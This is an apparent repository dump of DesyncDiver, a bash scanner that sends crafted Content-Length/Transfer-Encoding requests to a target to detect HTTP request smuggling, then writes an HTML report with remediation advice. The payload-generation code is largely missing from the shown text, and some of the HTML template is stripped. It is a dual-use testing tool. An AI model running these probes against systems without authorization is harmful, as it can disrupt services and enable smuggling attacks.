├── LICENSE ├── README.md └── desyncdiver.sh /LICENSE: -------------------------------------------------------------------------------- 1 | MIT License 2 | 3 | Copyright (c) 2025 Jonas Resch 4 | 5 | Permission is hereby granted, free of charge, to any person obtaining a copy 6 | of this software and associated documentation files (the "Software"), to deal 7 | in the Software without restriction, including without limitation the rights 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell 9 | copies of the Software, and to permit persons to whom the Software is 10 | furnished to do so, subject to the following conditions: 11 | 12 | The above copyright notice and this permission notice shall be included in all 13 | copies or substantial portions of the Software. 14 | 15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 21 | SOFTWARE. 22 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # DesyncDiver 2 | 3 | **Active HTTP Desynchronization Vulnerability Scanner** 4 | 5 | ``` 6 | ██████╗ ███████╗███████╗██╗ ██╗███╗ ██╗ ██████╗██████╗ ██╗██╗ ██╗███████╗██████╗ 7 | ██╔══██╗██╔════╝██╔════╝╚██╗ ██╔╝████╗ ██║██╔════╝██╔══██╗██║██║ ██║██╔════╝██╔══██╗ 8 | ██║ ██║█████╗ ███████╗ ╚████╔╝ ██╔██╗ ██║██║ ██║ ██║██║██║ ██║█████╗ ██████╔╝ 9 | ██║ ██║██╔══╝ ╚════██║ ╚██╔╝ ██║╚██╗██║██║ ██║ ██║██║╚██╗ ██╔╝██╔══╝ ██╔══██╗ 10 | ██████╔╝███████╗███████║ ██║ ██║ ╚████║╚██████╗██████╔╝██║ ╚████╔╝ ███████╗██║ ██║ 11 | ╚═════╝ ╚══════╝╚══════╝ ╚═╝ ╚═╝ ╚═══╝ ╚═════╝╚═════╝ ╚═╝ ╚═══╝ ╚══════╝╚═╝ ╚═╝ 12 | ``` 13 | 14 | DesyncDiver is a bash-based tool for detecting HTTP Request Smuggling (Desynchronization) vulnerabilities in web servers and proxy chains. It actively tests targets by sending specially crafted HTTP requests designed to identify parsing inconsistencies between front-end and back-end servers. 15 | 16 | ## Features 17 | 18 | - **Advanced Payload Generation**: Creates and sends specially formatted HTTP requests that test for various desynchronization vulnerabilities 19 | - **Multiple Vulnerability Detection**: Tests for CL-TE, TE-CL, TE-TE, CL-CL and other header-based HTTP request smuggling vectors 20 | - **Detailed Reporting**: Generates comprehensive HTML reports with findings, recommendations, and technical details 21 | - **Flexible Configuration**: Customize headers, cookies, HTTP methods, and other parameters to suit your testing needs 22 | 23 | ## Installation 24 | 25 | DesyncDiver requires the following dependencies: 26 | - bash 27 | - curl 28 | - netcat (nc) 29 | - openssl 30 | - sed 31 | - grep 32 | - awk 33 | 34 | Most Linux distributions have these tools pre-installed. If not, you can install them using your package manager: 35 | 36 | ```bash 37 | # For Debian/Ubuntu 38 | sudo apt-get install bash curl netcat-openbsd openssl sed grep gawk 39 | 40 | # For RHEL/CentOS/Fedora 41 | sudo dnf install bash curl nc openssl sed grep gawk 42 | ``` 43 | 44 | To install DesyncDiver: 45 | 46 | ```bash 47 | # Clone the repository 48 | git clone https://github.com/reschjonas/DesyncDiver.git 49 | 50 | # Navigate to the directory 51 | cd desyncdiver 52 | 53 | # Make the script executable 54 | chmod +x desyncdiver.sh 55 | ``` 56 | 57 | ## Usage 58 | 59 | Basic usage: 60 | 61 | ```bash 62 | ./desyncdiver.sh -u https://example.com 63 | ``` 64 | 65 | Advanced usage with options: 66 | 67 | ```bash 68 | ./desyncdiver.sh -u https://example.com -v -t 15 -o ./my-results -p http://proxy:8080 -H "Authorization: Bearer token" -c "session=abc123" 69 | ``` 70 | 71 | ### Options 72 | 73 | | Option | Description | 74 | |--------|-------------| 75 | | `-u, --url ` | Target URL (required) | 76 | | `-o, --output ` | Output directory for results (default: ./results) | 77 | | `-t, --timeout ` | Request timeout in seconds (default: 10) | 78 | | `-p, --proxy ` | Use proxy (format: http://host:port) | 79 | | `-c, --cookies ` | Cookies to include with requests | 80 | | `-H, --header
` | Additional headers (can be used multiple times) | 81 | | `-m, --methods ` | HTTP methods to test (default: GET,POST) | 82 | | `-v, --verbose` | Enable verbose output | 83 | | `-h, --help` | Display help message | 84 | 85 | ## Examples 86 | 87 | Test a single website with default options: 88 | ```bash 89 | ./desyncdiver.sh -u https://example.com 90 | ``` 91 | 92 | Test with verbose output and custom timeout: 93 | ```bash 94 | ./desyncdiver.sh -u https://example.com -v -t 15 95 | ``` 96 | 97 | Test with custom headers and cookies: 98 | ```bash 99 | ./desyncdiver.sh -u https://example.com -H "X-Custom-Header: Value" -c "session=abc123" 100 | ``` 101 | 102 | ## How It Works 103 | 104 | DesyncDiver works by: 105 | 106 | 1. Generating specially crafted HTTP requests with various header combinations 107 | 2. Testing Content-Length and Transfer-Encoding header inconsistencies 108 | 3. Analyzing server responses for anomalies or unexpected behaviors 109 | 4. Identifying potential desynchronization vulnerabilities based on response patterns 110 | 5. Generating detailed reports with findings and recommendations 111 | 112 | ## Security Considerations 113 | 114 | - **Authorization**: Always ensure you have proper authorization before testing any website 115 | - **Legal Implications**: Unauthorized testing may be illegal in many jurisdictions 116 | - **Impact**: HTTP Request Smuggling tests can potentially disrupt service operations 117 | 118 | ## License 119 | 120 | This project is licensed under the MIT License - see the LICENSE.md file for details. 121 | 122 | ## Acknowledgments 123 | 124 | - Inspired by the research on HTTP Request Smuggling by [James Kettle (PortSwigger)](https://portswigger.net/research/http-desync-attacks-request-smuggling-reborn) 125 | - Thanks to the security community for documenting these vulnerabilities 126 | -------------------------------------------------------------------------------- /desyncdiver.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | # DesyncDiver - Active HTTP Desynchronization Tester 4 | # A tool for detecting HTTP Request Smuggling vulnerabilities 5 | 6 | # Text styling 7 | BOLD="\033[1m" 8 | RED="\033[0;31m" 9 | GREEN="\033[0;32m" 10 | YELLOW="\033[0;33m" 11 | BLUE="\033[0;34m" 12 | PURPLE="\033[0;35m" 13 | CYAN="\033[0;36m" 14 | NC="\033[0m" # No Color 15 | 16 | # Script configuration 17 | VERSION="1.0.0" 18 | DEFAULT_TIMEOUT=10 19 | DEFAULT_OUTPUT_DIR="./results" 20 | TEMP_DIR="/tmp/desyncdiver" 21 | 22 | # Function to display banner 23 | show_banner() { 24 | echo -e "${BLUE}${BOLD}" 25 | echo "██████╗ ███████╗███████╗██╗ ██╗███╗ ██╗ ██████╗██████╗ ██╗██╗ ██╗███████╗██████╗ " 26 | echo "██╔══██╗██╔════╝██╔════╝╚██╗ ██╔╝████╗ ██║██╔════╝██╔══██╗██║██║ ██║██╔════╝██╔══██╗" 27 | echo "██║ ██║█████╗ ███████╗ ╚████╔╝ ██╔██╗ ██║██║ ██║ ██║██║██║ ██║█████╗ ██████╔╝" 28 | echo "██║ ██║██╔══╝ ╚════██║ ╚██╔╝ ██║╚██╗██║██║ ██║ ██║██║╚██╗ ██╔╝██╔══╝ ██╔══██╗" 29 | echo "██████╔╝███████╗███████║ ██║ ██║ ╚████║╚██████╗██████╔╝██║ ╚████╔╝ ███████╗██║ ██║" 30 | echo "╚═════╝ ╚══════╝╚══════╝ ╚═╝ ╚═╝ ╚═══╝ ╚═════╝╚═════╝ ╚═╝ ╚═══╝ ╚══════╝╚═╝ ╚═╝" 31 | echo -e "${NC}" 32 | echo -e "${BOLD}HTTP Desynchronization Vulnerability Scanner v${VERSION}${NC}" 33 | echo -e "${YELLOW}Actively tests for HTTP Request Smuggling vulnerabilities${NC}\n" 34 | } 35 | 36 | # Function to display usage information 37 | show_usage() { 38 | echo -e "${BOLD}Usage:${NC}" 39 | echo -e " ${0} [options] -u " 40 | echo 41 | echo -e "${BOLD}Options:${NC}" 42 | echo -e " -u, --url Target URL (required)" 43 | echo -e " -o, --output Output directory for results (default: ${DEFAULT_OUTPUT_DIR})" 44 | echo -e " -t, --timeout Request timeout in seconds (default: ${DEFAULT_TIMEOUT})" 45 | echo -e " -p, --proxy Use proxy (format: http://host:port)" 46 | echo -e " -c, --cookies Cookies to include with requests" 47 | echo -e " -H, --header
Additional headers (can be used multiple times)" 48 | echo -e " -m, --methods HTTP methods to test (default: GET,POST)" 49 | echo -e " -v, --verbose Enable verbose output" 50 | echo -e " -h, --help Display this help message" 51 | echo 52 | echo -e "${BOLD}Examples:${NC}" 53 | echo -e " ${0} -u https://example.com" 54 | echo -e " ${0} -u https://example.com -v -t 15 -o ./my-results" 55 | echo -e " ${0} -u https://example.com -H \"Authorization: Bearer token\" -c \"session=abc123\"" 56 | echo 57 | } 58 | 59 | # Function to validate URL 60 | validate_url() { 61 | local url=$1 62 | if [[ ! $url =~ ^https?:// ]]; then 63 | echo -e "${RED}Error: URL must start with http:// or https://${NC}" 64 | return 1 65 | fi 66 | return 0 67 | } 68 | 69 | # Function to create directory if it doesn't exist 70 | create_dir_if_not_exists() { 71 | local dir=$1 72 | if [[ ! -d "$dir" ]]; then 73 | mkdir -p "$dir" || { echo -e "${RED}Error: Could not create directory ${dir}${NC}"; return 1; } 74 | fi 75 | return 0 76 | } 77 | 78 | # Function to generate payload with different content-length/transfer-encoding combinations 79 | generate_payload() { 80 | local method=$1 81 | local url=$2 82 | local payload_type=$3 83 | local host=$(echo "$url" | sed -E 's|^https?://([^/]+).*|\1|') 84 | local path=$(echo "$url" | sed -E 's|^https?://[^/]+(/.*)?|\1|') 85 | path=${path:-/} 86 | 87 | case "$payload_type" in 88 | "cl-te") 89 | cat < "$payload_file" 194 | 195 | # Add custom headers 196 | if [[ -n "$additional_headers" ]]; then 197 | # Insert headers before the empty line 198 | sed -i '/^$/i '"$additional_headers"'' "$payload_file" 199 | fi 200 | 201 | # Add cookies 202 | if [[ -n "$cookies" ]]; then 203 | # Insert cookies before the empty line 204 | sed -i '/^$/i Cookie: '"$cookies"'' "$payload_file" 205 | fi 206 | 207 | local result_file="${TEMP_DIR}/response_${payload_type}.txt" 208 | 209 | if [[ "$verbose" == "true" ]]; then 210 | echo -e "${CYAN}[*] Sending ${payload_type} payload with ${method}...${NC}" 211 | echo -e "${CYAN}[*] Payload:${NC}" 212 | cat "$payload_file" 213 | echo 214 | else 215 | echo -e "${CYAN}[*] Testing ${BOLD}${payload_type}${NC} ${CYAN}payload...${NC}" 216 | fi 217 | 218 | # Prepare proxy args 219 | local proxy_args="" 220 | if [[ -n "$proxy" ]]; then 221 | proxy_args="-x $proxy" 222 | fi 223 | 224 | # Send request using curl or netcat based on payload type 225 | local response_code 226 | local response_size 227 | 228 | if [[ $url == https://* ]]; then 229 | # For HTTPS, use openssl s_client with a timeout 230 | { timeout "$timeout" bash -c "cat '$payload_file'; sleep 1" | timeout "$timeout" openssl s_client -quiet -connect "${host}:${port}" > "$result_file" 2>/dev/null; } || true 231 | else 232 | # For HTTP, use netcat with a timeout 233 | { timeout "$timeout" bash -c "cat '$payload_file'; sleep 1" | timeout "$timeout" nc "$host" "$port" > "$result_file"; } || true 234 | fi 235 | 236 | # Record the baseline response for comparison 237 | if [[ ! -f "${TEMP_DIR}/baseline_response.txt" ]]; then 238 | local baseline_file="${TEMP_DIR}/baseline_response.txt" 239 | # Send a normal request to establish baseline 240 | if [[ $url == https://* ]]; then 241 | timeout "$timeout" curl -s -k "$url" > "$baseline_file" 242 | else 243 | timeout "$timeout" curl -s "$url" > "$baseline_file" 244 | fi 245 | local baseline_size=$(wc -c < "$baseline_file") 246 | echo -e "${BLUE}[*] Established baseline response: ${baseline_size} bytes${NC}" 247 | fi 248 | 249 | # Analyze response 250 | if [[ -s "$result_file" ]]; then 251 | response_code=$(grep -o "HTTP/[0-9.]* [0-9]*" "$result_file" | awk '{print $2}') 252 | response_size=$(wc -c < "$result_file") 253 | 254 | # Save detailed response to output directory 255 | cp "$result_file" "${output_dir}/${payload_type}_response.txt" 256 | 257 | # Extract server information to detect CDN/proxy 258 | local server_info=$(grep -E "Server:|X-Served-By:|Via:" "$result_file" | tr '\n' ' ') 259 | 260 | # Check for specific responses that indicate proper security handling 261 | local response_body="" 262 | if grep -q -e '^$' "$result_file"; then 263 | # Extract body content after the first empty line 264 | response_body=$(awk -v RS='^\r?\n$' 'NR==2{print}' "$result_file") 265 | else 266 | response_body=$(cat "$result_file") 267 | fi 268 | 269 | # Check for security responses that indicate proper handling 270 | local security_patterns=("broken chunked-encoding" "Bad Request" "Invalid Request" "line folding of header fields is not supported" "transfer-encoding header" "405 Not Allowed" "413 Payload Too Large" "400 Bad Request" "411 Length Required" "501 Not Implemented" "malformed" "invalid" "rejected" "length required" "too large" "not implemented" "not allowed") 271 | local is_security_response=false 272 | 273 | for pattern in "${security_patterns[@]}"; do 274 | if grep -q "$pattern" "$result_file"; then 275 | is_security_response=true 276 | break 277 | fi 278 | done 279 | 280 | # Check for CDN/proxy presence 281 | local cdn_patterns=("Varnish" "Fastly" "Cloudflare" "Akamai" "CloudFront" "cache" "CDN" "proxy") 282 | local has_cdn=false 283 | 284 | for pattern in "${cdn_patterns[@]}"; do 285 | if grep -i -q "$pattern" "$result_file"; then 286 | has_cdn=true 287 | break 288 | fi 289 | done 290 | 291 | # Analyze response 292 | if [[ -z "$response_code" ]]; then 293 | # No response code - could be a desync 294 | echo -e "${YELLOW}[!] ${BOLD}Unexpected response format${NC} ${YELLOW}for ${payload_type} payload${NC}" 295 | echo -e "${YELLOW}[!] This could indicate a desynchronization vulnerability${NC}" 296 | echo -e "${YELLOW}[!] Response size: ${response_size} bytes${NC}" 297 | if [[ "$has_cdn" == "true" ]]; then 298 | echo -e "${BLUE}[i] CDN detected: ${server_info}${NC}" 299 | echo -e "${BLUE}[i] This may be a false positive as CDNs often protect against request smuggling${NC}" 300 | return 1 # Likely a false positive 301 | fi 302 | return 0 # Potential vulnerability 303 | elif [[ "$response_code" == "40"* || "$response_code" == "50"* ]]; then 304 | # Error response - could be good or bad depending on context 305 | if [[ "$is_security_response" == "true" ]]; then 306 | echo -e "${BLUE}[-] Security response: HTTP ${response_code} - Proper handling of malformed request${NC}" 307 | echo -e "${BLUE}[-] This indicates the server is correctly rejecting invalid requests${NC}" 308 | return 1 # Not a vulnerability 309 | else 310 | # Check for known false positive patterns 311 | if [[ "$has_cdn" == "true" && ("$response_code" == "400" || "$response_code" == "405" || "$response_code" == "413") ]]; then 312 | echo -e "${BLUE}[-] CDN protection: HTTP ${response_code} - ${server_info}${NC}" 313 | return 1 # Not a vulnerability 314 | else 315 | echo -e "${GREEN}[+] ${BOLD}Potential vulnerability detected${NC} ${GREEN}with ${payload_type} payload${NC}" 316 | echo -e "${GREEN}[+] Response code: ${response_code}, Size: ${response_size} bytes${NC}" 317 | return 0 # Potential vulnerability 318 | fi 319 | fi 320 | elif [[ "$response_code" == "20"* ]]; then 321 | # Successful response - check if suspicious 322 | if [[ "$payload_type" == "cl-te" || "$payload_type" == "te-cl" ]]; then 323 | # It's suspicious if malformed requests get 200 OK 324 | echo -e "${GREEN}[+] ${BOLD}Suspicious behavior:${NC} ${GREEN}Malformed ${payload_type} request got HTTP 200${NC}" 325 | echo -e "${GREEN}[+] This may indicate a desynchronization vulnerability${NC}" 326 | return 0 # Potential vulnerability 327 | else 328 | echo -e "${BLUE}[-] Normal response: HTTP ${response_code} (${response_size} bytes)${NC}" 329 | return 1 # No vulnerability detected 330 | fi 331 | else 332 | echo -e "${BLUE}[-] Normal response: HTTP ${response_code} (${response_size} bytes)${NC}" 333 | return 1 # No vulnerability detected 334 | fi 335 | else 336 | echo -e "${RED}[!] ${BOLD}No response received${NC} ${RED}for ${payload_type} payload${NC}" 337 | echo -e "${RED}[!] This could indicate a connection timeout, server timeout, or desynchronization${NC}" 338 | # For te-te payload, timeouts may indicate vulnerability but could also be network issues 339 | if [[ "$payload_type" == "te-te" ]]; then 340 | echo -e "${YELLOW}[!] Connection hung with ${BOLD}${payload_type}${NC} ${YELLOW}payload - requires manual verification${NC}" 341 | # Create empty response file to note the timeout 342 | echo "CONNECTION TIMED OUT - Requires manual verification" > "${output_dir}/${payload_type}_response.txt" 343 | return 1 # Mark as needing verification, not automatically a vulnerability 344 | fi 345 | return 2 # Error 346 | fi 347 | } 348 | 349 | # Function to create HTML report 350 | create_report() { 351 | local output_dir=$1 352 | local target_url=$2 353 | local report_file="${output_dir}/desyncdiver_report.html" 354 | local vulnerable_payloads=$3 355 | local timestamp=$(date "+%Y-%m-%d %H:%M:%S") 356 | 357 | # Extract server information if available 358 | local server_info="" 359 | for payload_type in "${payload_types[@]}"; do 360 | local response_file="${output_dir}/${payload_type}_response.txt" 361 | if [[ -f "$response_file" ]]; then 362 | server_info=$(grep -E "Server:|X-Served-By:|Via:" "$response_file" | head -n 1) 363 | if [[ -n "$server_info" ]]; then 364 | break 365 | fi 366 | fi 367 | done 368 | 369 | # Check for CDN/proxy 370 | local cdn_detected="" 371 | if grep -q -E "Varnish|Fastly|Cloudflare|Akamai|CloudFront|cache|CDN|proxy" <(echo "$server_info"); then 372 | cdn_detected="CDN/proxy detected: $(echo "$server_info" | tr -d '\n')" 373 | fi 374 | 375 | # Generate the HTML report 376 | cat > "$report_file" < 378 | 379 | 380 | 381 | 382 | DesyncDiver - HTTP Desynchronization Scan Report 383 | 480 | 481 | 482 |
483 |

DesyncDiver Scan Report

484 |

HTTP Desynchronization Vulnerability Scanner

485 |
486 | 487 |
488 |

Scan Summary

489 | 490 | 491 | 492 | 493 | 494 | 495 | 496 | 497 | 498 | 499 | 500 | 501 | 502 | 503 | 504 | 505 | 506 | 507 | 508 | 509 | 510 |
Target URL${target_url}
Scan Date${timestamp}
Vulnerabilities Found$(echo "$vulnerable_payloads" | wc -l)
Server Information${server_info:-Unknown}
CDN/Proxy${cdn_detected:-None detected}
511 | 512 |
513 |

About HTTP Desynchronization: HTTP Request Smuggling (also known as desynchronization) is a technique for interfering with the way a website processes HTTP request sequences. It occurs when front-end and back-end systems interpret HTTP headers differently, allowing attackers to "smuggle" requests to the back-end server.

514 |

False Positives: Modern CDNs and security systems often implement protections that can trigger responses similar to vulnerable servers. This report attempts to distinguish between real vulnerabilities and proper security responses.

515 |
516 |
517 | 518 |

Findings

519 | EOF 520 | 521 | # If no vulnerabilities found 522 | if [[ -z "$vulnerable_payloads" ]]; then 523 | cat >> "$report_file" < 525 |

No HTTP Desynchronization Vulnerabilities Detected

526 |

The target appears to be properly handling HTTP request headers and does not show signs of HTTP request smuggling vulnerabilities based on the tests performed.

527 | 528 |
529 |

Security Analysis: The target responded appropriately to malformed and malicious HTTP requests, indicating proper header validation and handling.

530 | EOF 531 | # If CDN detected, add specific note 532 | if [[ -n "$cdn_detected" ]]; then 533 | cat >> "$report_file" <CDN Protection: The target appears to be behind a CDN or proxy which provides additional protection against HTTP request smuggling attacks. CDNs typically implement strict HTTP parsing rules that prevent desynchronization attacks.

535 | EOF 536 | fi 537 | 538 | cat >> "$report_file" < 540 |
541 | EOF 542 | else 543 | # Add each vulnerability 544 | while IFS= read -r payload_type; do 545 | response_file="${output_dir}/${payload_type}_response.txt" 546 | response_content=$(cat "$response_file" | sed 's//\>/g') 547 | 548 | # Extract response code 549 | response_code=$(grep -o "HTTP/[0-9.]* [0-9]*" "$response_file" | awk '{print $2}') 550 | 551 | # Determine if this is likely a false positive 552 | is_false_positive=false 553 | if grep -q -i -E "Varnish|Fastly|Cloudflare|Akamai|CloudFront|cache|CDN|proxy" "$response_file"; then 554 | if grep -q -E "broken chunked-encoding|Bad Request|Invalid Request|line folding|405 Not Allowed|413 Payload" "$response_file"; then 555 | is_false_positive=true 556 | fi 557 | fi 558 | 559 | # Determine severity 560 | severity="medium" 561 | if [[ "$payload_type" == "cl-te" || "$payload_type" == "te-cl" ]]; then 562 | severity="high" 563 | elif [[ "$payload_type" == "cl-cl" || "$payload_type" == "te-te" ]]; then 564 | severity="medium" 565 | else 566 | severity="low" 567 | fi 568 | 569 | # Adjust severity if it's likely a false positive 570 | if [[ "$is_false_positive" == "true" ]]; then 571 | severity="low" 572 | fi 573 | 574 | cat >> "$report_file" < 576 |

Potential HTTP Desynchronization Vulnerability: ${payload_type}

577 |

Severity: $(echo "$severity" | sed 's/./\u&/')

578 |

Description: The server showed unexpected behavior when handling the ${payload_type} payload, which suggests it may be vulnerable to HTTP Request Smuggling attacks.

579 | 580 |

Technical Details

581 |

This vulnerability occurs when front-end and back-end servers interpret HTTP headers differently, allowing attackers to "smuggle" requests to the back-end server.

582 | EOF 583 | 584 | # Add false positive warning if applicable 585 | if [[ "$is_false_positive" == "true" ]]; then 586 | cat >> "$report_file" < 588 |

Possible False Positive: The response indicates this may be a security feature rather than a vulnerability. The server is correctly rejecting malformed requests with appropriate error codes, which is the expected behavior for secure systems.

589 | 590 | EOF 591 | fi 592 | 593 | # Add specific details based on payload type 594 | case "$payload_type" in 595 | "cl-te") 596 | cat >> "$report_file" < 598 |

CL-TE Attack Vector: This attack occurs when the front-end server uses the Content-Length header but the back-end server uses the Transfer-Encoding header. This specific test uses a chunked body that would be interpreted differently depending on which header is honored.

599 | 600 | EOF 601 | ;; 602 | "te-cl") 603 | cat >> "$report_file" < 605 |

TE-CL Attack Vector: This attack occurs when the front-end server uses the Transfer-Encoding header but the back-end server uses the Content-Length header. The conflicting headers can cause request desynchronization.

606 | 607 | EOF 608 | ;; 609 | "te-te") 610 | cat >> "$report_file" < 612 |

TE-TE Attack Vector: This attack uses duplicate or obfuscated Transfer-Encoding headers that may be processed differently by different servers. Some servers may honor only the first or the last header, leading to desynchronization.

613 | 614 | EOF 615 | ;; 616 | "cl-cl") 617 | cat >> "$report_file" < 619 |

CL-CL Attack Vector: This attack uses duplicate Content-Length headers with different values. If front-end and back-end servers honor different instances of the header, it can lead to request smuggling.

620 | 621 | EOF 622 | ;; 623 | esac 624 | 625 | cat >> "$report_file" <Server Response 627 |
${response_content}
628 | 629 |

Recommendations

630 |
    631 |
  • Ensure consistent HTTP header parsing across all servers in the chain
  • 632 |
  • Validate and sanitize all headers, especially Content-Length and Transfer-Encoding
  • 633 |
  • Consider implementing strict HTTP parsing rules
  • 634 |
  • Update web servers and proxies to the latest versions
  • 635 | EOF 636 | 637 | # Add CDN recommendation if no CDN detected 638 | if ! grep -q -i -E "Varnish|Fastly|Cloudflare|Akamai|CloudFront|cache|CDN|proxy" "$response_file"; then 639 | cat >> "$report_file" <Consider using a CDN or Web Application Firewall that provides protection against HTTP request smuggling 641 | EOF 642 | fi 643 | 644 | cat >> "$report_file" < 646 | 647 | EOF 648 | done <<< "$vulnerable_payloads" 649 | fi 650 | 651 | # Close the HTML 652 | cat >> "$report_file" < 654 |

    Generated by DesyncDiver v${VERSION} | ${timestamp}

    655 | 656 | 657 | 658 | EOF 659 | 660 | echo -e "${GREEN}[+] Report generated: ${report_file}${NC}" 661 | } 662 | 663 | # Main function 664 | main() { 665 | # Default values 666 | local url="" 667 | local output_dir="$DEFAULT_OUTPUT_DIR" 668 | local timeout="$DEFAULT_TIMEOUT" 669 | local proxy="" 670 | local cookies="" 671 | local headers="" 672 | local methods="GET,POST" 673 | local verbose=false 674 | 675 | # Parse command-line arguments 676 | while [[ $# -gt 0 ]]; do 677 | case "$1" in 678 | -u|--url) 679 | url="$2" 680 | shift 2 681 | ;; 682 | -o|--output) 683 | output_dir="$2" 684 | shift 2 685 | ;; 686 | -t|--timeout) 687 | timeout="$2" 688 | shift 2 689 | ;; 690 | -p|--proxy) 691 | proxy="$2" 692 | shift 2 693 | ;; 694 | -c|--cookies) 695 | cookies="$2" 696 | shift 2 697 | ;; 698 | -H|--header) 699 | headers="${headers}${2}\n" 700 | shift 2 701 | ;; 702 | -m|--methods) 703 | methods="$2" 704 | shift 2 705 | ;; 706 | -v|--verbose) 707 | verbose=true 708 | shift 709 | ;; 710 | -h|--help) 711 | show_banner 712 | show_usage 713 | exit 0 714 | ;; 715 | *) 716 | echo -e "${RED}Error: Unknown option: $1${NC}" 717 | show_usage 718 | exit 1 719 | ;; 720 | esac 721 | done 722 | 723 | # Show banner 724 | show_banner 725 | 726 | # Check required arguments 727 | if [[ -z "$url" ]]; then 728 | echo -e "${RED}Error: URL is required${NC}" 729 | show_usage 730 | exit 1 731 | fi 732 | 733 | # Validate URL 734 | validate_url "$url" || exit 1 735 | 736 | # Create output directory 737 | create_dir_if_not_exists "$output_dir" || exit 1 738 | 739 | # Create temporary directory 740 | create_dir_if_not_exists "$TEMP_DIR" || exit 1 741 | 742 | echo -e "${BLUE}[*] Target: ${BOLD}${url}${NC}" 743 | echo -e "${BLUE}[*] Output directory: ${output_dir}${NC}" 744 | echo -e "${BLUE}[*] Starting scan...${NC}\n" 745 | 746 | # Define payload types to test 747 | local payload_types=("cl-te" "te-cl" "te-te" "cl-cl" "space-te" "crlf-te") 748 | 749 | # List to store vulnerable payload types 750 | local vulnerable_payloads="" 751 | 752 | # Counter for real vulnerabilities vs false positives 753 | local potential_vulns=0 754 | 755 | # Check for CDN/WAF first 756 | local has_cdn=false 757 | local cdn_info="" 758 | 759 | echo -e "${BLUE}[*] Checking for CDN/WAF protection...${NC}" 760 | local headers_file="${TEMP_DIR}/headers.txt" 761 | if [[ $url == https://* ]]; then 762 | curl -s -I -k "$url" > "$headers_file" 763 | else 764 | curl -s -I "$url" > "$headers_file" 765 | fi 766 | 767 | if grep -q -i -E "Varnish|Fastly|Cloudflare|Akamai|CloudFront|cache|CDN|proxy|WAF" "$headers_file"; then 768 | has_cdn=true 769 | cdn_info=$(grep -E "Server:|X-Served-By:|Via:|CF-RAY:|X-Cache:|X-Powered-By:" "$headers_file" | tr '\n' ' ') 770 | echo -e "${BLUE}[*] CDN/WAF detected: ${BOLD}${cdn_info}${NC}" 771 | echo -e "${YELLOW}[!] Note: CDNs/WAFs often provide protection against HTTP desync attacks${NC}" 772 | else 773 | echo -e "${YELLOW}[!] No CDN/WAF detected - site may be more vulnerable to desync attacks${NC}" 774 | fi 775 | echo 776 | 777 | # Process each HTTP method 778 | IFS=',' read -ra method_array <<< "$methods" 779 | for method in "${method_array[@]}"; do 780 | echo -e "${PURPLE}[*] Testing with HTTP method: ${BOLD}${method}${NC}" 781 | 782 | # Process each payload type 783 | for payload_type in "${payload_types[@]}"; do 784 | # Send payload and check for vulnerability 785 | if send_payload "$url" "$payload_type" "$method" "$timeout" "$proxy" "$headers" "$cookies" "$verbose" "$output_dir"; then 786 | vulnerable_payloads="${vulnerable_payloads}${payload_type}\n" 787 | ((potential_vulns++)) 788 | fi 789 | echo 790 | done 791 | done 792 | 793 | # Generate final report 794 | echo -e "${BLUE}[*] Scan completed. Generating report...${NC}" 795 | create_report "$output_dir" "$url" "$(echo -e "$vulnerable_payloads" | grep -v '^$')" 796 | 797 | # Cleanup temporary files 798 | rm -rf "$TEMP_DIR" 799 | 800 | echo -e "${GREEN}[+] Scan completed successfully!${NC}" 801 | 802 | # Show summary 803 | local vuln_count=$(echo -e "$vulnerable_payloads" | grep -v '^$' | wc -l) 804 | if [[ $vuln_count -gt 0 ]]; then 805 | if [[ "$has_cdn" == "true" ]]; then 806 | echo -e "${YELLOW}[!] ${BOLD}${vuln_count} potential issues detected, but may include false positives${NC}" 807 | echo -e "${YELLOW}[!] Target is protected by a CDN/WAF which reduces the risk${NC}" 808 | else 809 | echo -e "${RED}[!] ${BOLD}${vuln_count} potential vulnerabilities detected!${NC}" 810 | fi 811 | echo -e "${YELLOW}[!] Check the detailed report for analysis: ${output_dir}/desyncdiver_report.html${NC}" 812 | else 813 | echo -e "${GREEN}[+] No HTTP desynchronization vulnerabilities detected.${NC}" 814 | if [[ "$has_cdn" == "true" ]]; then 815 | echo -e "${GREEN}[+] Target is well-protected by CDN/WAF: ${cdn_info}${NC}" 816 | fi 817 | fi 818 | } 819 | 820 | # Check dependencies 821 | check_dependencies() { 822 | local missing_deps=() 823 | 824 | # Check for required tools 825 | for cmd in curl nc openssl sed grep awk wc timeout; do 826 | if ! command -v "$cmd" &>/dev/null; then 827 | missing_deps+=("$cmd") 828 | fi 829 | done 830 | 831 | if [[ ${#missing_deps[@]} -gt 0 ]]; then 832 | echo -e "${RED}Error: Missing dependencies: ${missing_deps[*]}${NC}" 833 | echo -e "${YELLOW}Please install the required dependencies and try again.${NC}" 834 | exit 1 835 | fi 836 | } 837 | 838 | # Run dependency check 839 | check_dependencies 840 | 841 | # Run the main function with all arguments passed to the script 842 | main "$@" --------------------------------------------------------------------------------